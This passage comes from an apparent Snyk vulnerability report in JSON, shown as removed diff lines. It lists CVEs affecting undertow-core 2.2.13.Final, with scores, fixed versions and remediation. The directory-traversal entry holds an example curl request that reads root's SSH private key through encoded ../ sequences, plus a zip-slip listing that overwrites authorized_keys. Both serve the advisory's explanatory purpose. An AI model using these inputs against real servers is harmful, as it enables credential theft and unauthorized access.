"severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:00.539446Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:20.874470Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.060024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.539446Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in flow control handling by the browser over HTTP/2. This may cause overhead or a denial of service in the server. This is due to an incomplete fix of [CVE-2021-3629](https://security.snyk.io/vuln/SNYK-JAVA-IOUNDERTOW-2847922).\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.25.Final, 2.3.6.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1477)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2137)\n", - "epssDetails": { - "percentile": "0.46729", - "probability": "0.00120", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-1259" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2023-03-12T11:00:33.646508Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-12T10:57:54Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2023-03-12T11:00:33.868032Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.539446Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.25.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-6567186", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.32.Final)", - "[2.3.0.Alpha1,2.3.13.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.32.Final", - "2.3.13.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java%23L46", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-05T13:32:48.961817Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": 
"2024-05-13T12:05:39.932206Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-05T13:32:48.961817Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `FormAuthenticationMechanism`. An attacker can exhaust the server's memory, leading to a Denial of Service by sending crafted requests that cause an OutofMemory error.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.32.Final, 2.3.13.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java#L46)\n", - "epssDetails": null, - "identifiers": { - "CVE": [ - "CVE-2023-1973" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-04-05T14:06:11.114809Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-04-04T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-04-05T14:06:11.299727Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-05-13T12:05:39.932206Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.32.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-6669948", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.31.Final)", - "[2.3.0.Alpha1,2.3.12.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.31.Final", - "2.3.12.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242099", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:13.170450Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-05-13T12:00:48.159973Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.170450Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java 
web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured `max-header-size` attribute in `ajp-listener`, leading to the server closing the TCP connection without returning an AJP response.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the `max-header-size` is set to 64 KB or less.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2242099)\n", - "epssDetails": { - "percentile": "0.21648", - "probability": "0.00053", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-5379" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-04-21T07:43:26.561967Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-12-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-04-21T07:43:26.742123Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-05-13T12:00:48.159973Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.31.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": 
"io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7300152", - "title": "Uncontrolled Resource Consumption", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.33.Final)", - "[2.3.0.Final,2.3.14.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.33.Final", - "2.3.14.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293069", - "title": "Red Hat Bugzilla Bug" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.7, - "cvssVersion": "4.0", - "modificationTime": "2024-06-24T09:03:55.525177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-06-24T09:03:55.525177Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption through the handling of URL-encoded request path information on `ajp-listener`. 
An attacker can cause the server to process incorrect paths, leading to a disruption of service by sending specially crafted concurrent requests.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2293069)\n", - "epssDetails": { - "percentile": "0.09306", - "probability": "0.00043", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-6162" - ], - "CWE": [ - "CWE-400" - ], - "GHSA": [ - "GHSA-9442-gm4v-r222" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-06-21T06:28:17.382174Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-06-20T15:31:19Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-06-21T07:17:01.928932Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-24T09:03:55.525177Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7300153", - "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Bartek Nowotarski" - ], - "semver": { - "vulnerable": [ - "[,2.2.33.Final)", - "[2.3.0.Final,2.3.14.Final)" - ] - }, - "exploit": "Not 
Defined", - "fixedIn": [ - "2.2.33.Final", - "2.3.14.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://httpd.apache.org/security/vulnerabilities_24.html", - "title": "Apache Advisory" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0", - "title": "Github Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268277", - "title": "RedHat Bugzilla Bug" - }, - { - "url": "https://www.kb.cert.org/vuls/id/421644", - "title": "Security Notes" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-04T13:31:53.396581Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-05-28T11:02:47.420228Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-06-07T01:11:20.186304Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.7, - "cvssVersion": "4.0", - "modificationTime": "2024-06-24T09:04:33.419941Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-06-24T09:04:33.419941Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-04T13:31:53.396581Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-05-28T11:02:47.420228Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-06-07T01:11:20.186304Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to insufficient limitations on the amount of `CONTINUATION` frames that can be sent within a single stream. An attacker can use up compute or memory resources to cause a disruption in service by sending packets to vulnerable servers.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [Apache Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)\n- [Github Commit](https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2268277)\n- [Security Notes](https://www.kb.cert.org/vuls/id/421644)\n", - "epssDetails": { - "percentile": "0.75602", - "probability": "0.00459", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-27316" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-06-21T06:34:44.643940Z", - "functions_new": [], - 
"alternativeIds": [], - "disclosureTime": "2024-04-03T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-06-21T06:34:44.890198Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-24T09:04:33.419941Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7361775", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.33.Final)", - "[2.3.0.Final,2.3.12.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.33.Final", - "2.3.12.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259475", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-05-09T13:34:57.715909Z" - }, - { - "assigner": "NVD", - 
"severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:52:49.711513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-06-24T08:51:30.646140Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-05-09T13:34:57.715909Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:49.711513Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Directory Traversal due to improper input validation of the HTTP request. An attacker can access privileged or restricted files and directories by appending a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. 
By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2259475)\n", - "epssDetails": { - "percentile": "0.20823", - "probability": "0.00052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-1459" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-06-24T08:51:30.470325Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-01-18T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-06-24T08:51:30.645852Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-24T08:51:30.646140Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7433720", - "title": "Uncontrolled Recursion", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.3.8.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.8.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - 
"severity": "high", - "cvssScore": 8.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292211", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/errata/RHSA-2024:4392", - "title": "Red Hat Security Advisory" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.7, - "cvssVersion": "4.0", - "modificationTime": "2024-07-17T10:19:41.285562Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-07-17T10:19:41.285562Z" - } - ], - "description": "## 